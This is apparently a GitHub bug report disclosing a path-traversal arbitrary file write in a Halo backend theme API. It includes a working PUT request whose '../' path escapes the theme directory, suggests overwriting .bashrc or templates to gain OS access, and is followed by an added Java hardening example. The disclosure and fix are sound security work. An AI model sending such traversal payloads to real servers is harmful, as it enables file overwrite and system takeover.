An Arbitrary file writing vulnerability in the backend #421

Closed
@any-how

I am sure I have checked


I want to apply

  • BUG feedback

There is an interface for writing files in the backend. A directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.

```
PUT /api/admin/themes/caicai_anatole/files/content HTTP/1.1
Host: xxxx:8090
Content-Length: 105
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://xxx:8090
Referer: http://xxxx:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/root/.halo/templates/themes/anatole/../../../../../../tmp/pwned","content":"xxxxx\nxxxttt\nbb"}
```

Therefore, the attacker can overwrite some files, such as ftl files and .bashrc files in the user directory, and finally get the permissions of the operating system.
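The check described in the report and one way to harden it, as an added example that is not part of the original issue and is not Halo's own code: `weakCheck` is an assumed reconstruction of a string-prefix check, and the class and method names are hypothetical. It goes slightly beyond the reported request by also covering a sibling directory that merely shares the prefix (constructed sample).

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class ThemePathCheck {

    // Assumed shape of the weak check: a raw string comparison.
    // "../" segments after the expected prefix are never resolved,
    // so the prefix matches even though the target is elsewhere.
    static boolean weakCheck(String themeRoot, String requested) {
        return requested.startsWith(themeRoot);
    }

    // Hardened check: resolve "." and ".." first, then compare whole
    // path components with Path.startsWith (not String.startsWith).
    // Caveat: normalize() does not follow symlinks; where the target
    // already exists, compare toRealPath() results instead.
    static boolean strictCheck(String themeRoot, String requested) {
        Path root = Paths.get(themeRoot).toAbsolutePath().normalize();
        Path target = Paths.get(requested).toAbsolutePath().normalize();
        return target.startsWith(root);
    }

    public static void main(String[] args) {
        // Theme root taken from the path in the reported request.
        String root = "/root/.halo/templates/themes/anatole";
        String[] samples = {
            // Legitimate theme file (constructed sample).
            root + "/index.ftl",
            // Path from the reported request body.
            root + "/../../../../../../tmp/pwned",
            // Sibling directory sharing the string prefix (constructed sample).
            root + "_evil/index.ftl",
        };
        for (String s : samples) {
            Path resolved = Paths.get(s).toAbsolutePath().normalize();
            System.out.printf("weak=%b strict=%b resolved=%s%n",
                    weakCheck(root, s), strictCheck(root, s), resolved);
        }
    }
}
```

The write handler should reject the request whenever `strictCheck` returns false, and should use the normalized path, not the original string, for the actual file write.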
